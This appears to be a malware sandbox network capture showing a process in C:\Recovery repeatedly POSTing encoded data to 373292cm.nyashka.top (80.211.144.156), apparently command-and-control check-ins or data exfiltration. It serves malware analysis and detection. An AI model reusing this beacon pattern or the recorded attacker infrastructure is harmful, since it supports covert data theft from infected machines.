                                    Aug 25, 2024 15:44:48.674720049 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.674869061 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:48.679663897 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.029845953 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.076081038 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.204603910 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.204881907 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.205096006 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.205106974 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.368427038 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.419815063 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.566720963 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.607279062 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.697293997 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.698234081 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.702629089 CEST804982080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.702680111 CEST4982080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.703110933 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:49.703174114 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.703299999 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:49.709157944 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.065424919 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.070658922 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.070676088 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.070686102 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.389305115 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.435422897 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.585814953 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.638657093 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.713963985 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.714989901 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.722027063 CEST804982180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.722079039 CEST4982180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.723768950 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:50.723851919 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.724037886 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:50.731298923 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.076299906 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.081496000 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.081515074 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.081523895 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.419457912 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.466804981 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.593199015 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.593430042 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.718858957 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719099998 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.719799995 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719814062 CEST804982280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.719945908 CEST4982280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.720071077 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.720071077 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.728435040 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.729629993 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.737142086 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:51.737232924 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.737345934 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:51.744725943 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.076334000 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.081335068 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.081456900 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.091742992 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.096745968 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.096759081 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.096775055 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.400051117 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.435131073 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.451030016 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.482285023 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.531572104 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.569750071 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.576029062 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.622960091 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.852638960 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.853029013 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.853437901 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.857928038 CEST804982380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858023882 CEST4982380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858297110 CEST804982480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858355045 CEST4982480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858505964 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:52.858577967 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.858716965 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:52.867607117 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.216969013 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.221919060 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.221931934 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.221942902 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.553256989 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.607316017 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.756934881 CEST804982580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.810451984 CEST4982580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.873157978 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.878474951 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:53.878544092 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.878699064 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:53.890471935 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.232433081 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.239167929 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.239187002 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.239197969 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.568727970 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.623054981 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.705913067 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.747981071 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.835617065 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.835973978 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.840898991 CEST804982680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.840962887 CEST4982680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.841303110 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:54.841373920 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.841490984 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:54.846329927 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.226845026 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.231865883 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.231880903 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.231889009 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.536597967 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.591696024 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.737406969 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.779258966 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.854275942 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.854562044 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860100985 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.860169888 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860313892 CEST804982780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:55.860363960 CEST4982780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.860450029 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:55.866018057 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.216856003 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.221990108 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.222006083 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.222023964 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.531467915 CEST804982880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:56.576035023 CEST4982880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:56.820089102 CEST804982880.211.144.156192.168.2.6
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Aug 25, 2024 15:43:30.687942028 CEST | 50423 | 53 | 192.168.2.6 | 1.1.1.1
                                    Aug 25, 2024 15:43:30.873758078 CEST | 53 | 50423 | 1.1.1.1 | 192.168.2.6

                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Aug 25, 2024 15:43:30.687942028 CEST | 192.168.2.6 | 1.1.1.1 | 0x7787 | Standard query (0) | 373292cm.nyashka.top | A (IP address) | IN (0x0001) | false

                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Aug 25, 2024 15:43:30.873758078 CEST | 1.1.1.1 | 192.168.2.6 | 0x7787 | No error (0) | 373292cm.nyashka.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false
                                    • 373292cm.nyashka.top
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.6 | 49718 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:30.889875889 CEST | 292 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 344
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:31.249459028 CEST | 344 | OUT | Data Raw: 00 01 01 05 03 0d 04 02 05 06 02 01 02 00 01 03 00 02 05 09 02 0c 03 0c 03 05 0c 01 07 0e 01 03 0d 51 06 01 02 51 05 05 0c 53 07 0b 06 01 07 05 05 03 0e 0c 0a 0e 05 04 05 06 04 56 01 03 06 01 03 04 0a 0e 00 06 01 01 0c 55 0d 03 0f 01 0d 01 04 54
                                    Data Ascii: QQSVUTW_U\L~k^r@wLiBwuoSko}vlcXstxRQE{NTIhS`CcYpe~V@x}rNra
                                    Aug 25, 2024 15:43:31.562022924 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:31.655786037 CEST | 1236 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 1320
                                    Connection: keep-alive
                                    Aug 25, 2024 15:43:31.696103096 CEST | 268 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 384
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:31.901365995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:31.901577950 CEST | 384 | OUT | Data Raw: 5f 53 5c 53 51 45 54 5e 5b 5f 5a 51 59 53 58 5e 57 59 5d 59 57 50 53 59 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _S\SQET^[_ZQYSX^WY]YWPSY\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/U0![$]#V))+()-Y"//7Q+47#9^8&F$.Y/5
                                    Aug 25, 2024 15:43:32.201215029 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 57 3d 26 3e 12 31 38 3c 54 27 33 2a 55 29 2d 38 07 3d 04 31 15 27 06 07 17 31 07 27 0d 33 2b 2a 02 29 3d 31 0b 26 3f 06 04 2d 0e 2b 5d 0c 13 21 06 23 29 32 58 24 3c 30 5d 3d 3b 2c 03 22 2c 0c 1e 3c 39 2d 55 3f 01 02 59 3c 00 34 05 28 29 3d 0e 38 01 2a 07 3a 09 29 0e 37 2e 2b 52 0d 11 24 57 3c 2e 21 55 29 07 3b 5f 22 5e 3f 5e 27 13 31 08 26 1c 3a 54 24 3a 30 1f 25 54 21 12 33 08 39 12 26 38 2a 12 26 06 35 56 23 22 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &W=&>18<T'3*U)-8=1'1'3+*)=1&?-+]!#)2X$<0]=;,",<9-U?Y<4()=8*:)7.+R$W<.!U);_"^?^'1&:T$:0%T!39&8*&5V#"#T,"W3UV
                                    Aug 25, 2024 15:43:32.361114025 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:32.612957001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:32.613209009 CEST | 1840 | OUT | Data Raw: 5a 57 5c 5e 54 49 54 5b 5b 5f 5a 51 59 51 58 52 57 51 5d 58 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: ZW\^TIT[[_ZQYQXRWQ]XW_S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._8U8"_ 39*>(+=:<-#7,#Q ?9_ 18&F$.Y/=
                                    Aug 25, 2024 15:43:32.905910969 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive
                                    Data Raw: 09 1d 26 56 2a 25 04 11 26 2b 20 51 33 0a 2e 53 29 2e 27 5f 2b 2e 25 14 30 3b 29 1a 25 10 0d 0d 27 15 21 59 3f 3d 26 51 31 2f 09 10 2d 0e 2b 5d 0c 13 21 06 20 29 39 00 31 05 28 5d 2b 38 05 5d 22 12 04 1e 29 3a 03 55 3c 01 20 58 3c 29 37 11 2a 2a 31 0b 2c 28 0f 16 2e 30 2a 51 22 2e 2b 52 0d 11 24 54 29 2e 39 54 2a 07 3f 5d 22 28 2f 59 24 3e 39 09 32 54 32 55 30 00 38 5d 26 32 32 0e 24 21 36 09 24 2b 31 06 25 3c 3d 50 22 32 23 54 2c 00 22 57 01 33 55 56
                                    Data Ascii: &V*%&+ Q3.S).'_+.%0;)%'!Y?=&Q1/-+]! )91(]+8]"):U< X<)7**1,(.0*Q".+R$T).9T*?]"(/Y$>92T2U08]&22$!6$+1%<=P"2#T,"W3UV


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.6 | 49719 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:31.997689009 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:32.342020988 CEST | 2516 | OUT | Data Raw: 5f 5c 59 54 54 41 54 5a 5b 5f 5a 51 59 56 58 54 57 58 5d 5f 57 51 53 54 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _\YTTATZ[_ZQYVXTWX]_WQST\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-/?A6=4^40:><Y<=?7[ ? !+<_;]735Y,&F$.Y/!
                                    Aug 25, 2024 15:43:32.700649023 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:32.829896927 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    2 | 192.168.2.6 | 49722 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:33.214910030 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:43:33.569463015 CEST | 2516 | OUT | Data Raw: 5f 55 5c 55 54 40 54 5b 5b 5f 5a 51 59 5e 58 51 57 5a 5d 5f 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _U\UT@T[[_ZQY^XQWZ]_W_S_\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V._,36=Y"#")4+-9<.;X Z,#!<?:##%Y8&F$.Y/
                                    Aug 25, 2024 15:43:33.887882948 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:34.019633055 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    3 | 192.168.2.6 | 49723 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:34.298100948 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:34.654220104 CEST2512OUTData Raw: 5f 57 59 54 54 46 54 50 5b 5f 5a 51 59 57 58 5e 57 51 5d 5e 57 5c 53 5c 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _WYTTFTP[_ZQYWX^WQ]^W\S\\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V-,#(6?"0*. <>9+=8#?3W#! <'" =^..&F$.Y/
                                    Aug 25, 2024 15:43:34.968353033 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:35.167907000 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.6 | 49725 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:35.523880959 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:35.888590097 CEST2516OUTData Raw: 5f 51 5c 5e 54 44 54 50 5b 5f 5a 51 59 52 58 5e 57 5c 5d 5c 57 51 53 5d 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _Q\^TDTP[_ZQYRX^W\]\WQS]\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.,U'#-\ Z)0+_?#Y ?7R48S+:4##%\,&F$.Y/1
                                    Aug 25, 2024 15:43:36.178261042 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:36.378669977 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.6 | 49726 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:43:36.908601046 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:43:37.264010906 CEST2516OUTData Raw: 5f 53 59 54 51 44 54 5e 5b 5f 5a 51 59 51 58 5e 57 5c 5d 5e 57 58 53 5b 5c 5d 5f 5a 5b 5f 5f 55 5a 5a 52 5b 55 5f 55 52 58 5e 5c 58 55 56 54 59 5a 5f 58 5b 58 5f 50 5e 58 5d 53 5a 57 59 50 5e 5c 5d 5c 58 50 5f 57 50 42 5e 5a 53 42 58 58 5a 53 5f
                                    Data Ascii: _SYTQDT^[_ZQYQX^W\]^WXS[\]_Z[__UZZR[U_URX^\XUVTYZ_X[X_P^X]SZWYP^\]\XP_WPB^ZSBXXZS_TRW]_]S]UP^]QU^^^RU[[_T[ATZ_YXZZXQXTXUZ__[^UCSYT_VX\TR[\ZQ_A\SS_[[QZV[Y_G\T^[RB\]YX_XPZQR_[XYRC[YXZW[V.Y,'@5=# )+=Y+=5)=/ S 0P(_7"0:/&F$.Y/=
                                    Aug 25, 2024 15:43:37.570903063 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:43:37.699767113 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:43:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
